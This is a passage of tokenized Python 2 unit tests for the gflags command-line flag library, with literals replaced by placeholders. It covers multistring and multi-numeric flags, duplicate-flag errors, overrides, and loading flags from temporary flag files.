) , <NUM_LIT:2> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:0> ) <EOL> gflags . DEFINE_multistring ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT:s>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ '<STR_LIT>' , ] ) <EOL> multi_string_defs = [ '<STR_LIT>' , '<STR_LIT>' , ] <EOL> gflags . DEFINE_multistring ( '<STR_LIT>' , multi_string_defs , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT:m>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , multi_string_defs ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ '<STR_LIT>' , '<STR_LIT>' , ] ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:q>' , None ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:x>' , None ) , <NUM_LIT:8> ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:q>' , None ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:x>' , None ) , <NUM_LIT:9> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:0> ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:q>' , None ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:x>' , None ) , <NUM_LIT:10> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:1> ) <EOL> oldtestlist = FLAGS . testlist <EOL> oldtestspacelist = FLAGS . testspacelist <EOL> argv = ( '<STR_LIT>' , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> testlist1 = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> testspacelist1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS . testlist = list ( testlist1 ) <EOL> FLAGS . testspacelist = list ( testspacelist1 ) <EOL> argv = ( '<STR_LIT>' , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . testlist , testlist1 ) <EOL> self . assertEqual ( FLAGS . testspacelist , testspacelist1 ) <EOL> testlist1 = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> testspacelist1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS . testlist = list ( testlist1 ) <EOL> FLAGS . testspacelist = list ( testspacelist1 ) <EOL> argv = ( '<STR_LIT>' , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . testlist , testlist1 ) <EOL> self . assertEqual ( FLAGS . testspacelist , testspacelist1 ) <EOL> FLAGS . testlist = oldtestlist <EOL> FLAGS . testspacelist = oldtestspacelist <EOL> def ArgsString ( ) : <EOL> flagnames = FLAGS . RegisteredFlags ( ) <EOL> flagnames . sort ( ) <EOL> nonbool_flags = [ '<STR_LIT>' % ( name , FLAGS . get ( name , None ) ) <EOL> for name in flagnames <EOL> if not isinstance ( FLAGS [ name ] , gflags . BooleanFlag ) ] <EOL> truebool_flags = [ '<STR_LIT>' % ( name ) <EOL> for name in flagnames <EOL> if isinstance ( FLAGS [ name ] , gflags . BooleanFlag ) and <EOL> FLAGS . get ( name , None ) ] <EOL> falsebool_flags = [ '<STR_LIT>' % ( name ) <EOL> for name in flagnames <EOL> if isinstance ( FLAGS [ name ] , gflags . BooleanFlag ) and <EOL> not FLAGS . get ( name , None ) ] <EOL> return '<STR_LIT:U+0020>' . join ( nonbool_flags + truebool_flags + falsebool_flags ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:name>' , None ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( ArgsString ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:name>' , None ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( ArgsString ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:q>' ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> pass <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:z>' ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:z>' ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:s>' ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT:s>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> flagnames = [ "<STR_LIT>" ] <EOL> original_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( flagnames [ <NUM_LIT:0> ] , False , "<STR_LIT>" , <EOL> flag_values = original_flags ) <EOL> duplicate_flags = module_foo . DuplicateFlags ( flagnames ) <EOL> try : <EOL> original_flags . AppendFlagValues ( duplicate_flags ) <EOL> except gflags . DuplicateFlagError , e : <EOL> self . assertTrue ( "<STR_LIT>" in str ( e ) ) <EOL> self . assertTrue ( "<STR_LIT>" in str ( e ) ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:0> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:0> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:1> ) <EOL> except gflags . DuplicateFlag , e : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:0> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:0> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:1> ) <EOL> except gflags . DuplicateFlag , e : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT>' , <EOL> allow_override = <NUM_LIT:0> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:0> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" , short_name = '<STR_LIT>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> except gflags . DuplicateFlagCannotPropagateNoneToSwig , e : <EOL> pass <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> self . assert_ ( str ( FLAGS ) . find ( '<STR_LIT>' ) == - <NUM_LIT:1> ) <EOL> self . assert_ ( str ( FLAGS ) . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> new_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> self . assertEqual ( len ( new_flags . FlagDict ( ) ) , <NUM_LIT:2> ) <EOL> old_len = len ( FLAGS . FlagDict ( ) ) <EOL> FLAGS . AppendFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) - old_len , <NUM_LIT:2> ) <EOL> self . assertEqual ( "<STR_LIT>" in FLAGS . FlagDict ( ) , True ) <EOL> self . assertEqual ( "<STR_LIT>" in FLAGS . FlagDict ( ) , True ) <EOL> FLAGS . RemoveFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) , old_len ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> new_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags , <EOL> short_name = "<STR_LIT>" ) <EOL> self . assertEqual ( len ( new_flags . FlagDict ( ) ) , <NUM_LIT:3> ) <EOL> old_len = len ( FLAGS . FlagDict ( ) ) <EOL> FLAGS . AppendFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) - old_len , <NUM_LIT:3> ) <EOL> self . assertTrue ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertTrue ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertTrue ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertEqual ( FLAGS . FlagDict ( ) [ '<STR_LIT>' ] , FLAGS . FlagDict ( ) [ '<STR_LIT>' ] ) <EOL> FLAGS . RemoveFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) , old_len ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> new_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> try : <EOL> FLAGS . AppendFlagValues ( new_flags ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( '<STR_LIT>' <EOL> + str ( FLAGS . repeat ) ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . FlagsError : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> helpstr = FLAGS . ModuleHelp ( module_baz ) <EOL> expected_help = "<STR_LIT:\n>" + module_baz . __name__ + "<STR_LIT::>" + """<STR_LIT>""" <EOL> self . assertMultiLineEqual ( expected_help , helpstr ) <EOL> helpstr = FLAGS . MainModuleHelp ( ) <EOL> expected_help = "<STR_LIT:\n>" + sys . argv [ <NUM_LIT:0> ] + '<STR_LIT::>' + """<STR_LIT>""" <EOL> help_help = """<STR_LIT>""" <EOL> expected_help = expected_help . replace ( '<STR_LIT>' , <EOL> help_help + '<STR_LIT>' ) <EOL> self . assertMultiLineEqual ( expected_help , helpstr ) <EOL> class MultiNumericalFlagsTest ( googletest . TestCase ) : <EOL> def testMultiNumericalFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> int_defaults = [ <NUM_LIT> , <NUM_LIT> , ] <EOL> gflags . DEFINE_multi_int ( '<STR_LIT>' , int_defaults , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' ) <EOL> self . assertListEqual ( FLAGS . get ( '<STR_LIT>' , None ) , int_defaults ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> self . assertListEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ - <NUM_LIT> , <NUM_LIT> , ] ) <EOL> float_defaults = [ <NUM_LIT> , <NUM_LIT:3> ] <EOL> gflags . DEFINE_multi_float ( '<STR_LIT>' , float_defaults , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' ) <EOL> for ( expected , actual ) in zip ( float_defaults , FLAGS . get ( '<STR_LIT>' , None ) ) : <EOL> self . assertAlmostEquals ( expected , actual ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> expected_floats = [ - <NUM_LIT> , <NUM_LIT> ] <EOL> for ( expected , actual ) in zip ( expected_floats , FLAGS . get ( '<STR_LIT>' , None ) ) : <EOL> self . assertAlmostEquals ( expected , actual ) <EOL> def testSingleValueDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> int_default = <NUM_LIT> <EOL> gflags . DEFINE_multi_int ( '<STR_LIT>' , int_default , <EOL> '<STR_LIT>' ) <EOL> self . assertListEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ int_default ] ) <EOL> float_default = <NUM_LIT> <EOL> gflags . DEFINE_multi_float ( '<STR_LIT>' , float_default , <EOL> '<STR_LIT>' ) <EOL> actual = FLAGS . get ( '<STR_LIT>' , None ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( actual ) ) <EOL> self . assertAlmostEquals ( actual [ <NUM_LIT:0> ] , float_default ) <EOL> def testBadMultiNumericalFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> gflags . DEFINE_multi_int , '<STR_LIT>' , [ '<STR_LIT:abc>' ] , '<STR_LIT>' ) <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> gflags . DEFINE_multi_float , '<STR_LIT>' , [ '<STR_LIT:abc>' ] , '<STR_LIT>' ) <EOL> gflags . DEFINE_multi_int ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> FLAGS , argv ) <EOL> gflags . DEFINE_multi_float ( '<STR_LIT>' , <NUM_LIT> , <EOL> '<STR_LIT>' ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> FLAGS , argv ) <EOL> class LoadFromFlagFileTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . FlagValues ( ) <EOL> self . flag_values . UseGnuGetOpt ( False ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , <EOL> lower_bound = <NUM_LIT:0> , flag_values = self . flag_values ) <EOL> gflags . DEFINE_list ( '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> self . files_to_delete = [ ] <EOL> def tearDown ( self ) : <EOL> self . _RemoveTestFiles ( ) <EOL> def _SetupTestFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_path = '<STR_LIT>' <EOL> if os . path . exists ( tmp_path ) : <EOL> shutil . rmtree ( tmp_path ) <EOL> os . makedirs ( tmp_path ) <EOL> try : <EOL> tmp_flag_file_1 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> tmp_flag_file_2 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> tmp_flag_file_3 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> tmp_flag_file_4 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> except IOError , e_msg : <EOL> print e_msg <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT:\n>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> file_list = [ tmp_flag_file_1 . name ] <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' % tmp_flag_file_1 . name ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> file_list . append ( tmp_flag_file_2 . name ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' % tmp_flag_file_3 . name ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' ) <EOL> file_list . append ( tmp_flag_file_3 . name ) <EOL> tmp_flag_file_4 . write ( '<STR_LIT>' % tmp_flag_file_3 . name ) <EOL> tmp_flag_file_4 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_4 . write ( '<STR_LIT>' ) <EOL> os . chmod ( tmp_path + '<STR_LIT>' , <NUM_LIT:0> ) <EOL> file_list . append ( tmp_flag_file_4 . name ) <EOL> tmp_flag_file_1 . close ( ) <EOL> tmp_flag_file_2 . close ( ) <EOL> tmp_flag_file_3 . close ( ) <EOL> tmp_flag_file_4 . close ( ) <EOL> self . files_to_delete = file_list <EOL> return file_list <EOL> def _RemoveTestFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> for file_name in self . files_to_delete : <EOL> try : <EOL> os . remove ( file_name ) <EOL> except OSError , e_msg : <EOL> print '<STR_LIT>' % e_msg <EOL> def _ReadFlagsFromFiles ( self , argv , force_gnu ) : <EOL> return argv [ : <NUM_LIT:1> ] + self . flag_values . ReadFlagsFromFiles ( argv [ <NUM_LIT:1> : ] , <EOL> force_gnu = force_gnu ) <EOL> def testMethod_flagfiles_1 ( self ) : <EOL> """<STR_LIT>""" <EOL> fake_cmd_line = '<STR_LIT>' <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> self . flag_values ( fake_argv ) <EOL> self . assertEqual ( self . flag_values . UnitTestBoolFlag , <NUM_LIT:1> ) <EOL> self . assertEqual ( fake_argv , self . _ReadFlagsFromFiles ( fake_argv , False ) ) <EOL> def testMethod_flagfiles_2 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_3 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:1> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_4 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:2> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_5 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_6 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:0> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_7 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . flag_values . UseGnuGetOpt ( ) <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:0> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_8 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:0> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , True ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_NoPermissions ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:3> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> self . assertRaises ( gflags . CantOpenFlagFileError , 